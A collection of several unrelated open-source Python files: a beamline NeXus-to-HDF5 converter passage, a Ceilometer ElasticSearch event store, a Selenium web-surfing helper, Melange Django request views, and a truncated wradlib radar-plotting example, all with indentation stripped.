if ggchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip()+apstr3+'/'+ggchild_of_root.tag.strip())
values.append(ggchild_of_root.text.strip())
dDetPars = dict(zip(keys, values))
#self.logger.debug(dDetPars
if 'SampleParameters' in xmlGrp:
samplepars = xmlGrp['SampleParameters']
samplepars = samplepars[...]
samplepars = samplepars[0]
root = ET.fromstring(samplepars)
keys = []
values = []
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
for gchild_of_root in child_of_root:
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip())
values.append(gchild_of_root.text.strip())
dSamlePars = dict(zip(keys, values))
#self.logger.debug(dSamlePars
if 'xmapMca' in e1Grp:
xmapmcaGrp = e1Grp['xmapMca']
if 'allElementSum' in xmapmcaGrp:
allElementSum = xmapmcaGrp['allElementSum']
allElementSum = allElementSum[...]
if 'fullSpectrum' in xmapmcaGrp:
fullSpectrum = xmapmcaGrp['fullSpectrum']
fullSpectrum = fullSpectrum[...]
if 'icr' in xmapmcaGrp:
icr = xmapmcaGrp['icr']
icr = icr[...]
if 'ocr' in xmapmcaGrp:
ocr = xmapmcaGrp['ocr']
ocr = ocr[...]
if 'realX' in xmapmcaGrp:
realX = xmapmcaGrp['realX']
realX = realX[...]
if 'sc_MicroFocusSampleY' in xmapmcaGrp:
sc_MicroFocusSampleY = xmapmcaGrp['sc_MicroFocusSampleY']
sc_MicroFocusSampleY = sc_MicroFocusSampleY[...]
# Close
f.close()
scan_data = scan()
scan_data.scan_name = 'DLS Scan'
scan_data.scan_time_stamp = ' '
# create mca calib description array
scan_data.mca_calib_description_arr = []
# create mca calibration array
scan_data.mca_calib_arr = np.zeros((fullSpectrum.shape[2]))
scan_data.x_pixels = fullSpectrum.shape[0]
scan_data.x_coord_arr = realX
scan_data.y_pixels = fullSpectrum.shape[1]
scan_data.y_coord_arr = sc_MicroFocusSampleY
#detector_arr = fltarr(x_pixels, y_pixels, info.no_detectors)
scan_data.detector_arr = np.zeros((fullSpectrum.shape[0],fullSpectrum.shape[1],fullSpectrum.shape[2]))
scan_data.detector_description_arr = []
#mca_arr = fltarr(x_pixels, y_pixels, no_energy_channels, info.no_detectors)
scan_data.mca_arr = fullSpectrum
return scan_data
#----------------------------------------------------------------------
def convert_nxs_to_h5(self, nfilename, hfilename, overwrite = True):
# Open HDF5 file
f = call_function_with_retry(h5py.File, 5, 0.1, 1.1, (nfilename, 'r'))
if f == None:
self.logger.error('Error reading %s', nfilename)
return None
#f = h5py.File(nfilename, 'r')
if 'entry1' in f:
e1Grp = f['entry1']
if 'xml' in e1Grp:
xmlGrp = e1Grp['xml']
if 'ScanParameters' in xmlGrp:
scanpars = xmlGrp['ScanParameters']
scanpars = scanpars[...]
scanpars = scanpars[0]
root = ET.fromstring(scanpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dScanPars = dict(zip(keys, values))
#self.logger.debug(dScanPars
if 'OutputParameters' in xmlGrp:
outpars = xmlGrp['OutputParameters']
outpars = outpars[...]
outpars = outpars[0]
root = ET.fromstring(outpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dOutPars = dict(zip(keys, values))
#self.logger.debug(dOutPars
if 'DetectorParameters' in xmlGrp:
detpars = xmlGrp['DetectorParameters']
detpars = detpars[...]
detpars = detpars[0]
root = ET.fromstring(detpars)
keys = []
values = []
ndetgrp = 1
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
nionch = 1
apstr1 = ''
if child_of_root.tag.strip() == 'detectorGroup':
apstr1 = str(ndetgrp)
ndetgrp += 1
ndet = 1
for gchild_of_root in child_of_root:
apstr2 = ''
if gchild_of_root.tag.strip() == 'detector':
apstr2 = str(ndet)
ndet += 1
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+apstr1+'/'+gchild_of_root.tag.strip()+apstr2)
values.append(gchild_of_root.text.strip())
else:
apstr3 = ''
if gchild_of_root.tag.strip() == 'ionChamber':
apstr3 = str(nionch)
nionch += 1
for ggchild_of_root in gchild_of_root:
if ggchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip()+apstr3+'/'+ggchild_of_root.tag.strip())
values.append(ggchild_of_root.text.strip())
dDetPars = dict(zip(keys, values))
#self.logger.debug(dDetPars
if 'SampleParameters' in xmlGrp:
samplepars = xmlGrp['SampleParameters']
samplepars = samplepars[...]
samplepars = samplepars[0]
root = ET.fromstring(samplepars)
keys = []
values = []
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
for gchild_of_root in child_of_root:
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip())
values.append(gchild_of_root.text.strip())
dSamlePars = dict(zip(keys, values))
#self.logger.debug(dSamlePars
if 'xmapMca' in e1Grp:
xmapmcaGrp = e1Grp['xmapMca']
if 'allElementSum' in xmapmcaGrp:
allElementSum = xmapmcaGrp['allElementSum']
allElementSum = allElementSum[...]
if 'fullSpectrum' in xmapmcaGrp:
fullSpectrum = xmapmcaGrp['fullSpectrum']
fullSpectrum = fullSpectrum[...]
if 'icr' in xmapmcaGrp:
icr = xmapmcaGrp['icr']
icr = icr[...]
if 'ocr' in xmapmcaGrp:
ocr = xmapmcaGrp['ocr']
ocr = ocr[...]
if 'realX' in xmapmcaGrp:
realX = xmapmcaGrp['realX']
realX = realX[...]
if 'sc_MicroFocusSampleY' in xmapmcaGrp:
sc_MicroFocusSampleY = xmapmcaGrp['sc_MicroFocusSampleY']
sc_MicroFocusSampleY = sc_MicroFocusSampleY[...]
# Close
f.close()
mca_arr = allElementSum
# set compression level where applicable:
gzip = 5
file_status = 0
entry_exists = 0
verbose = 0
# test whether a file with this filename already exists:
try:
# Open HDF5 file
f = h5py.File(hfilename, 'r')
if verbose:
self.logger.debug('Have HDF5 file: %s', hfilename)
file_exists = 1
file_is_hdf = 1
file_status = 2
#MAPS HDF5 group
if 'MAPS' in f:
if verbose:
self.logger.debug('MAPS group found in file: %s', hfilename)
mapsGrp = f['MAPS']
file_status = 3
if 'mca_arr' in mapsGrp:
if verbose:
self.logger.debug('MAPS\\mca_arr found in file: %s', hfilename)
file_status = 4
# at the moment, simply overwrite the mca_arr section of
# the file; in the future, may want to test, and only
# overwrite if specific flag is set.
f.close()
except:
if verbose:
self.logger.debug('Creating new file: %s', hfilename)
if verbose:
self.logger.debug('file_status: %s', file_status)
if overwrite:
file_status = 0
self.logger.debug('hfilename: %s', hfilename)
if file_status <= 1 :
f = h5py.File(hfilename, 'w')
else :
f = h5py.File(hfilename, 'a')
if file_status <= 3 :
# create a group for maps to hold the data
mapsGrp = f.create_group('MAPS')
# now set a comment
mapsGrp.attrs['comments'] = 'This is the group that stores all relevant information created (and read) by the the MAPS analysis software'
if file_status >= 4 :
mapsGrp = f['MAPS']
entry_exists = 1
if entry_exists == 0:
# create dataset and save full spectra
data = np.transpose(mca_arr)
dimensions = data.shape
chunk_dimensions = (dimensions[0], 1, 1)
comment = 'these are the full spectra at each pixel of the dataset'
ds_data = mapsGrp.create_dataset('mca_arr', data = data, chunks=chunk_dimensions, compression='gzip', compression_opts=gzip)
ds_data.attrs['comments'] = comment
else:
# save the data to existing array
# delete old dataset, create new and save full spectra
data = np.transpose(mca_arr)
dimensions = data.shape
chunk_dimensions = (dimensions[0], 1, 1)
comment = 'these are the full spectra at each pixel of the dataset'
del mapsGrp['mca_arr']
ds_data = mapsGrp.create_dataset('mca_arr', data = data, chunks=chunk_dimensions, compression='gzip', compression_opts=gzip)
ds_data.attrs['comments'] = comment
entryname = 'x_axis'
comment = 'stores the values of the primary fast axis positioner, typically sample x'
data = realX
ds_data = mapsGrp.create_dataset(entryname, data = data)
ds_data.attrs['comments'] = comment
entryname = 'y_axis'
comment = 'stores the values of the slow axis positioner, typically sample y'
data = sc_MicroFocusSampleY
ds_data = mapsGrp.create_dataset(entryname, data = data)
ds_data.attrs['comments'] = comment
f.close()
return
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import operator
import elasticsearch as es
from elasticsearch import helpers
from oslo_log import log
from oslo_utils import netutils
from oslo_utils import timeutils
import six
from ceilometer.event.storage import base
from ceilometer.event.storage import models
from ceilometer.i18n import _LE, _LI
from ceilometer import storage
from ceilometer import utils
LOG = log.getLogger(__name__)
AVAILABLE_CAPABILITIES = {
'events': {'query': {'simple': True}},
}
AVAILABLE_STORAGE_CAPABILITIES = {
'storage': {'production_ready': True},
}
class Connection(base.Connection):
"""Put the event data into an ElasticSearch db.
Events in ElasticSearch are indexed by day and stored by event_type.
An example document::
{"_index":"events_2014-10-21",
"_type":"event_type0",
"_id":"dc90e464-65ab-4a5d-bf66-ecb956b5d779",
"_score":1.0,
"_source":{"timestamp": "2014-10-21T20:02:09.274797"
"traits": {"id4_0": "2014-10-21T20:02:09.274797",
"id3_0": 0.7510790937279408,
"id2_0": 5,
"id1_0": "18c97ba1-3b74-441a-b948-a702a30cbce2"}
}
}
"""
CAPABILITIES = utils.update_nested(base.Connection.CAPABILITIES,
AVAILABLE_CAPABILITIES)
STORAGE_CAPABILITIES = utils.update_nested(
base.Connection.STORAGE_CAPABILITIES,
AVAILABLE_STORAGE_CAPABILITIES,
)
index_name = 'events'
# NOTE(gordc): mainly for testing, data is not searchable after write,
# it is only searchable after periodic refreshes.
_refresh_on_write = False
def __init__(self, url):
url_split = netutils.urlsplit(url)
self.conn = es.Elasticsearch(url_split.netloc)
def upgrade(self):
iclient = es.client.IndicesClient(self.conn)
ts_template = {
'template': '*',
'mappings': {'_default_':
{'_timestamp': {'enabled': True,
'store': True},
'properties': {'traits': {'type': 'nested'}}}}}
iclient.put_template(name='enable_timestamp', body=ts_template)
def record_events(self, events):
def _build_bulk_index(event_list):
for ev in event_list:
traits = {t.name: t.value for t in ev.traits}
yield {'_op_type': 'create',
'_index': '%s_%s' % (self.index_name,
ev.generated.date().isoformat()),
'_type': ev.event_type,
'_id': ev.message_id,
'_source': {'timestamp': ev.generated.isoformat(),
'traits': traits,
'raw': ev.raw}}
error = None
for ok, result in helpers.streaming_bulk(
self.conn, _build_bulk_index(events)):
if not ok:
__, result = result.popitem()
if result['status'] == 409:
LOG.info(_LI('Duplicate event detected, skipping it: %s')
% result)
else:
LOG.exception(_LE('Failed to record event: %s') % result)
error = storage.StorageUnknownWriteError(result)
if self._refresh_on_write:
self.conn.indices.refresh(index='%s_*' % self.index_name)
while self.conn.cluster.pending_tasks(local=True)['tasks']:
pass
if error:
raise error
def _make_dsl_from_filter(self, indices, ev_filter):
q_args = {}
filters = []
if ev_filter.start_timestamp:
filters.append({'range': {'timestamp':
{'ge': ev_filter.start_timestamp.isoformat()}}})
while indices[0] < (
'%s_%s' % (self.index_name,
ev_filter.start_timestamp.date().isoformat())):
del indices[0]
if ev_filter.end_timestamp:
filters.append({'range': {'timestamp':
{'le': ev_filter.end_timestamp.isoformat()}}})
while indices[-1] > (
'%s_%s' % (self.index_name,
ev_filter.end_timestamp.date().isoformat())):
del indices[-1]
q_args['index'] = indices
if ev_filter.event_type:
q_args['doc_type'] = ev_filter.event_type
if ev_filter.message_id:
filters.append({'term': {'_id': ev_filter.message_id}})
if ev_filter.traits_filter or ev_filter.admin_proj:
trait_filters = []
or_cond = []
for t_filter in ev_filter.traits_filter or []:
value = None
for val_type in ['integer', 'string', 'float', 'datetime']:
if t_filter.get(val_type):
value = t_filter.get(val_type)
if isinstance(value, six.string_types):
value = value.lower()
elif isinstance(value, datetime.datetime):
value = value.isoformat()
break
if t_filter.get('op') in ['gt', 'ge', 'lt', 'le']:
op = (t_filter.get('op').replace('ge', 'gte')
.replace('le', 'lte'))
trait_filters.append(
{'range': {t_filter['key']: {op: value}}})
else:
tf = {"query": {"query_string": {
"query": "%s: \"%s\"" % (t_filter['key'], value)}}}
if t_filter.get('op') == 'ne':
tf = {"not": tf}
trait_filters.append(tf)
if ev_filter.admin_proj:
or_cond = [{'missing': {'field': 'project_id'}},
{'term': {'project_id': ev_filter.admin_proj}}]
filters.append(
{'nested': {'path': 'traits', 'query': {'filtered': {
'filter': {'bool': {'must': trait_filters,
'should': or_cond}}}}}})
q_args['body'] = {'query': {'filtered':
{'filter': {'bool': {'must': filters}}}}}
return q_args
def get_events(self, event_filter, limit=None):
if limit == 0:
return
iclient = es.client.IndicesClient(self.conn)
indices = iclient.get_mapping('%s_*' % self.index_name).keys()
if indices:
filter_args = self._make_dsl_from_filter(indices, event_filter)
if limit is not None:
filter_args['size'] = limit
results = self.conn.search(fields=['_id', 'timestamp',
'_type', '_source'],
sort='timestamp:asc',
**filter_args)
trait_mappings = {}
for record in results['hits']['hits']:
trait_list = []
if not record['_type'] in trait_mappings:
trait_mappings[record['_type']] = list(
self.get_trait_types(record['_type']))
for key in record['_source']['traits'].keys():
value = record['_source']['traits'][key]
for t_map in trait_mappings[record['_type']]:
if t_map['name'] == key:
dtype = t_map['data_type']
break
else:
dtype = models.Trait.TEXT_TYPE
trait_list.append(models.Trait(
name=key, dtype=dtype,
value=models.Trait.convert_value(dtype, value)))
gen_ts = timeutils.normalize_time(timeutils.parse_isotime(
record['_source']['timestamp']))
yield models.Event(message_id=record['_id'],
event_type=record['_type'],
generated=gen_ts,
traits=sorted(
trait_list,
key=operator.attrgetter('dtype')),
raw=record['_source']['raw'])
def get_event_types(self):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = set()
for index in es_mappings.keys():
for ev_type in es_mappings[index]['mappings'].keys():
seen_types.add(ev_type)
# TODO(gordc): tests assume sorted ordering but backends are not
# explicitly ordered.
# NOTE: _default_ is a type that appears in all mappings but is not
# real 'type'
seen_types.discard('_default_')
return sorted(list(seen_types))
@staticmethod
def _remap_es_types(d_type):
if d_type == 'string':
d_type = 'text'
elif d_type == 'long':
d_type = 'int'
elif d_type == 'double':
d_type = 'float'
elif d_type == 'date' or d_type == 'date_time':
d_type = 'datetime'
return d_type
def get_trait_types(self, event_type):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = []
for index in es_mappings.keys():
# if event_type exists in index and has traits
if (es_mappings[index]['mappings'].get(event_type) and
es_mappings[index]['mappings'][event_type]['properties']
['traits'].get('properties')):
for t_type in (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties'].keys()):
d_type = (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties']
[t_type]['type'])
d_type = models.Trait.get_type_by_name(
self._remap_es_types(d_type))
if (t_type, d_type) not in seen_types:
yield {'name': t_type, 'data_type': d_type}
seen_types.append((t_type, d_type))
def get_traits(self, event_type, trait_type=None):
t_types = dict((res['name'], res['data_type'])
for res in self.get_trait_types(event_type))
if not t_types or (trait_type and trait_type not in t_types.keys()):
return
result = self.conn.search('%s_*' % self.index_name, event_type)
for ev in result['hits']['hits']:
if trait_type and ev['_source']['traits'].get(trait_type):
yield models.Trait(
name=trait_type,
dtype=t_types[trait_type],
value=models.Trait.convert_value(
t_types[trait_type],
ev['_source']['traits'][trait_type]))
else:
for trait in ev['_source']['traits'].keys():
yield models.Trait(
name=trait,
dtype=t_types[trait],
value=models.Trait.convert_value(
t_types[trait],
ev['_source']['traits'][trait]))
|
|
# -*- coding=utf-8 -*-
from selenium.webdriver import Firefox, Chrome, FirefoxProfile
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.events import (EventFiringWebDriver,
AbstractEventListener)
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import (InvalidSelectorException,
TimeoutException,
ElementNotVisibleException)
from xvfbwrapper import Xvfb
from time import sleep
import urlparse
from shutil import rmtree
from tempfile import mkdtemp
from os import (listdir,
sep as os_sep)
class ConnectionError(Exception):
"""Generic error for timeouts, server error etc,
that are outside our control.
"""
class CustomListener(AbstractEventListener):
"""This class is needed by EventFiringWebDriver.
"""
pass
class Surfer:
"""This class does virtual web surfing on our demand
"""
def __init__(self, delay=1, browser="firefox"):
"""delay: Number of extra seconds to wait when a page is
supposedly loaded. Try raising this in case of weird errors.
browser: `firefox` or `chrome`. The ChromeDriver executable for your
OS must be inside the bin directory for Chrome to work. Get it from:
http://chromedriver.storage.googleapis.com/index.html
"""
self.extra_delay = delay # extra time to wait after each operation (s)
self.temp_dir = mkdtemp()
self.vdisplay = Xvfb()
self.vdisplay.start()
if browser == "firefox":
profile = FirefoxProfile()
# Open links in same window
profile.set_preference("browser.link.open_newwindow", 1)
# Download to temp dir, for files we can't open inline
profile.set_preference("browser.download.dir", self.temp_dir)
profile.set_preference("browser.download.folderList", 2)
profile.set_preference("browser.download.manager.showWhenStarting",
"False")
profile.set_preference("browser.helperApps.neverAsk.saveToDisk",
"application/msword, application/vnd.ms-word, application/rtf, application/octet-stream")
# Add extension for overriding Content-Disposition headers, etc
extensions_dir = os_sep.join(['bin', 'firefox-plugins-enabled'])
for filename in listdir(extensions_dir):
fullfilename = os_sep.join([extensions_dir, filename])
profile.add_extension(extension=fullfilename)
driver = Firefox(profile)
elif browser == "chrome":
# Add extension for overriding Content-Disposition headers
options = ChromeOptions()
options.add_extension('bin/undisposition.crx')
driver = Chrome(executable_path='bin/chromedriver',
chrome_options=options)
else:
raise Exception("Not a valid browser name")
self.selenium_driver = EventFiringWebDriver(driver, CustomListener())
"""selenium_driver is a EventFiringWebDriver, so that it can
trigger javascript event
"""
self.browser_version = " ".join([
self.selenium_driver.capabilities['browserName'],
self.selenium_driver.capabilities['version']]) # 'Firefox 33.0'
def get_last_download(self):
files = sorted([
f for f in listdir(self.temp_dir)])
if len(files) > 0:
return self.temp_dir + os_sep + files[-1]
else:
return None
def _get_nearest_ancestor(self, element, tagname):
ancestor = element.find_element_by_xpath("..")
while ancestor is not None and ancestor.tag_name != tagname:
try:
ancestor = element.find_element_by_xpath("..")
except InvalidSelectorException:
ancestor = None
return ancestor
def _scroll_element_into_view(self, element):
"""Scroll attached element into view
"""
y = element.location['y']
self.selenium_driver.execute_script('window.scrollTo(0, {0})'
.format(y))
def with_open_in_new_window(self, element, callback_, *args, **kwargs):
"""Shift-clicks on an element to open a new window,
calls the callback function, and then closes the
window and returns.
This is useful for iterating through a link tree
we cannot easily step back in (e.g. where the starting
the result of a POST request)
Callback function is called like this: `callback(Surfer, arguments)`
with a Surfer object placed in the new window
Returns the result of `callback`
"""
try:
actions = ActionChains(self.selenium_driver)
actions.move_to_element(element).perform()
self._scroll_element_into_view(element)
element.send_keys(Keys.SHIFT + Keys.ENTER)
except ElementNotVisibleException:
raise
self.selenium_driver.implicitly_wait(self.extra_delay)
sleep(self.extra_delay) # implicitly_wait doesn't work on FF?
windows = self.selenium_driver.window_handles
self.selenium_driver.switch_to_window(windows[-1])
if len(windows) > 1:
res = callback_(self, *args, **kwargs)
self.selenium_driver.close()
windows = self.selenium_driver.window_handles
self.selenium_driver.switch_to_window(windows[-1])
return res
def surf_to(self, url):
"""Simply go to an URL"""
try:
self.selenium_driver.get(url)
except TimeoutException:
raise ConnectionError
self.selenium_driver.implicitly_wait(self.extra_delay)
def click_on_stuff(self, xpath):
"""Will click on any elements pointed out by xPath.
Options in select menus will be selected, and an
onChange event fired (as this does not always happen automatically)
"""
# FIXME: Select menus will only work if they have an id!
element_list = self.selenium_driver.find_elements_by_xpath(xpath)
if not element_list:
raise Exception("No elements found for xPath `%s`" % xpath)
else:
for element in element_list:
try:
element.click()
except ElementNotVisibleException:
# Element not visible. This is not necessarily an error.
# but the user might want to consider using a more
# specific xPath expression.
continue
# actions = ActionChains(self.selenium_driver)
# actions.move_to_element(element)
# actions.click(element)
# actions.send_keys_to_element(element, Keys.ENTER)
# actions.perform()
if "tag_name" in dir(element) and element.tag_name == "option":
parent = self._get_nearest_ancestor(element, "select")
if parent is not None:
# Should be selected already, when clicking,
# but it seems like this does not always happen
value = element.get_attribute("value") or None
if value is not None:
select = Select(parent)
select.select_by_value(value)
# Manually trigger JS events
select_id = parent.get_attribute("id") or None
if select_id is not None:
js_function = """
window.triggerChange=function(){\
var el = document.getElementById('""" + select_id + """');\
el.dispatchEvent(new Event('change', { 'bubbles': true }));\
el.dispatchEvent(new Event('select', { 'bubbles': true }));\
el.dispatchEvent(new Event('click', { 'bubbles': true }));\
};"""
self.selenium_driver.execute_script(js_function)
self.selenium_driver.execute_script("triggerChange();")
else:
raise Exception("No <select> tag found for <option>")
self.selenium_driver.implicitly_wait(self.extra_delay)
def get_url_list(self, xpath):
url_list = []
element_list = self.selenium_driver.find_elements_by_xpath(xpath)
for element in element_list:
href = element.get_attribute("href")
if href is not None:
url_list.append(Url(href))
return url_list # list of Url objects
def get_element_list(self, xpath):
try:
return self.selenium_driver.find_elements_by_xpath(xpath)
except InvalidSelectorException:
pass
# maybe our xPath points at an attribute?
try:
return self.selenium_driver.find_elements_by_xpath(xpath + "/..")
except InvalidSelectorException:
pass
return None
def kill(self):
self.selenium_driver.close()
self.vdisplay.stop()
rmtree(self.temp_dir)
class Url:
"""Represents a url, from e.g. Surfer.get_url_list()
"""
def __init__(self, url):
self.href = url
def is_absolute(self):
"""Check if url is absolute or relative"""
return bool(urlparse.urlparse(self.href).netloc)
def make_absolute(self, reference_url):
"""Makes this Url absolute, by using the domain from reference_url.
Does not handle protocol relative URLs
"""
parse_object = urlparse(reference_url)
url_base = parse_object.scheme + "://" + parse_object.netloc
self.href = url_base + self.href
if __name__ == "__main__":
print "This module is only intended to be called from other scripts."
import sys
sys.exit()
|
|
#!/usr/bin/python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Views for Requests.
"""
__authors__ = [
'"Sverre Rabbelier" <[email protected]>',
'"Lennard de Rijk" <[email protected]>',
'"Pawel Solyga" <[email protected]>',
]
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models import user as user_logic
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import dynaform
from soc.views.helper import redirects
from soc.views.helper import responses
from soc.views.helper import widgets
from soc.views.models import base
import soc.models.request
import soc.logic.models.request
import soc.logic.dicts
import soc.views.helper
import soc.views.helper.lists
import soc.views.helper.responses
class View(base.View):
"""View methods for the Request model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['listSelf'] = ['checkIsUser']
rights['create'] = ['deny']
rights['edit'] = ['checkIsDeveloper']
rights['process_invite'] = ['checkIsMyGroupAcceptedRequest']
rights['list'] = ['checkIsDeveloper']
rights['delete'] = ['checkIsDeveloper']
rights['roles'] = ['checkIsUser']
new_params = {}
new_params['rights'] = rights
new_params['logic'] = soc.logic.models.request.logic
new_params['name'] = "Request"
new_params['sidebar_defaults'] = [('/%s/list', 'List %(name_plural)s',
'list')]
new_params['create_template'] = ['soc/request/create.html']
new_params['extra_dynaexclude'] = ['status', 'role_verbose', 'created_on']
new_params['create_extra_dynaproperties'] = {
'link_id': widgets.ReferenceField(reference_url='user'),
'role': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True),
'clean_link_id': cleaning.clean_existing_user('link_id'),
}
new_params['edit_extra_dynaproperties'] = {
'scope_path': forms.CharField(widget=forms.HiddenInput,
required=True),
}
patterns = [(r'^%(url_name)s/(?P<access_type>process_invite)/'
'%(key_fields)s$',
'soc.views.models.%(module_name)s.process_invite',
'Process Invite to become')]
new_params['extra_django_patterns'] = patterns
new_params['invite_processing_template'] = 'soc/request/process_invite.html'
new_params['request_processing_template'] = \
'soc/request/process_request.html'
params = dicts.merge(params, new_params)
super(View, self).__init__(params=params)
# create and store the special forms for invite and requests
self._params['invite_form'] = self._params['create_form']
updated_fields = {
'link_id': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True),
'group_id': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True)}
request_form = dynaform.extendDynaForm(
dynaform = self._params['create_form'],
dynaproperties = updated_fields)
self._params['request_form'] = request_form
@decorators.merge_params
@decorators.check_access
def processInvite(self, request, access_type,
page_name=None, params=None, **kwargs):
"""Creates the page upon which an invite can be processed.
Args:
request: the standard Django HTTP request object
access_type : the name of the access type which should be checked
page_name: the page name displayed in templates as page and header title
params: a dict with params for this View
kwargs: the Key Fields for the specified entity
"""
# get the context for this webpage
context = responses.getUniversalContext(request)
helper.responses.useJavaScript(context, params['js_uses_all'])
request_logic = params['logic']
# get the request entity using the information from kwargs
fields = {'link_id': kwargs['link_id'],
'scope_path': kwargs['scope_path'],
'role': kwargs['role'],
'status': 'group_accepted'}
request_entity = request_logic.getForFields(fields, unique=True)
# set the page name using the request_entity
context['page_name'] = '%s %s' % (page_name,
request_entity.role_verbose)
get_dict = request.GET
if 'status' in get_dict.keys():
if get_dict['status'] == 'rejected':
# this invite has been rejected mark as rejected
request_logic.updateEntityProperties(request_entity, {
'status': 'rejected'})
# redirect to user request overview
return http.HttpResponseRedirect('/user/requests')
# put the entity in the context
context['entity'] = request_entity
context['module_name'] = params['module_name']
context['invite_accepted_redirect'] = (
redirects.getInviteAcceptedRedirect(request_entity, self._params))
#display the invite processing page using the appropriate template
template = params['invite_processing_template']
return responses.respond(request, template, context=context)
@decorators.merge_params
@decorators.check_access
def listSelf(self, request, access_type,
page_name=None, params=None, **kwargs):
"""Displays the unhandled requests for this user.
Args:
request: the standard Django HTTP request object
access_type : the name of the access type which should be checked
page_name: the page name displayed in templates as page and header title
params: a dict with params for this View
kwargs: not used
"""
# get the current user
user_entity = user_logic.logic.getForCurrentAccount()
# construct the Unhandled Invites list
# only select the Invites for this user that haven't been handled yet
filter = {'link_id': user_entity.link_id,
'status': 'group_accepted'}
uh_params = params.copy()
uh_params['list_action'] = (redirects.getInviteProcessRedirect, None)
uh_params['list_description'] = ugettext(
"An overview of your unhandled invites.")
uh_list = helper.lists.getListContent(
request, uh_params, filter, idx=0)
# construct the Open Requests list
# only select the requests from the user
# that haven't been accepted by an admin yet
filter = {'link_id': user_entity.link_id,
'status': 'new'}
ar_params = params.copy()
ar_params['list_description'] = ugettext(
"List of your pending requests.")
ar_list = helper.lists.getListContent(
request, ar_params, filter, idx=1)
# fill contents with all the needed lists
contents = [uh_list, ar_list]
# call the _list method from base to display the list
return self._list(request, params, contents, page_name)
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
list_self = decorators.view(view.listSelf)
process_invite = decorators.view(view.processInvite)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
|
# ------------------------------------------------------------------------------
# Name: plot_cg_ppi_example.py
# Purpose: show a few examples on how to use wradlib.vis.plot_cg_ppi
#
# Author: Kai Muehlbauer
#
# Created: 25.02.2014
# Copyright: (c) Kai Muehlbauer 2014
# Licence: The MIT License
# ------------------------------------------------------------------------------
import numpy as np
# importing most matplotlib routines at once
import matplotlib.pyplot as pl
#pl.interactive(True)
# well, it's a wradlib example
import wradlib
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.ticker import NullFormatter,FuncFormatter, MaxNLocator
import os
def ex_plot_cg_ppi():
# pl.interactive(True)
# load a polar scan and create range and azimuth arrays accordingly
data = np.loadtxt(os.path.dirname(__file__) + '/' + 'data/polar_dBZ_tur.gz')
r = np.arange(0, data.shape[1])
az = np.arange(0, data.shape[0])
# mask data array for better presentation
mask_ind = np.where(data <= np.nanmin(data))
data[mask_ind] = np.nan
ma = np.ma.array(data, mask=np.isnan(data))
# cgax - curvelinear grid axis
# Main axis
# caax - twin cartesian axis
# secondary axis for cartesian coordinates (plotting, labeling etc.)
# paax - polar axis for plotting
# here all plotting in polar data is done
# pm - pcolormesh
# actual plot mappable
# Remark #1:
# The tight_layout function is great, but may not lead to
# satisfactory results in the first place. So labels, annotations
# and/or axes may need adjustment
# Remark #2:
# This examples makes heavy use of new matlotlib functionality. See
# function help for more information.
# ----------------------------------------------------------------
# First, creation of four simple figures
# figure #1
# the simplest call, plot cg ppi in new window
# plot simple CG PPI
wradlib.vis.plot_cg_ppi(ma, refrac=False)
t = pl.title('Simple CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #2
# now let's just plot a sector of data
# for this, we need to give the ranges and azimuths explicitly
# and one more than we pass on in the data, because we also may not use
# the autoext-feature, and otherwise the last row and column of our data
# would not be plotted
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False, refrac=False)
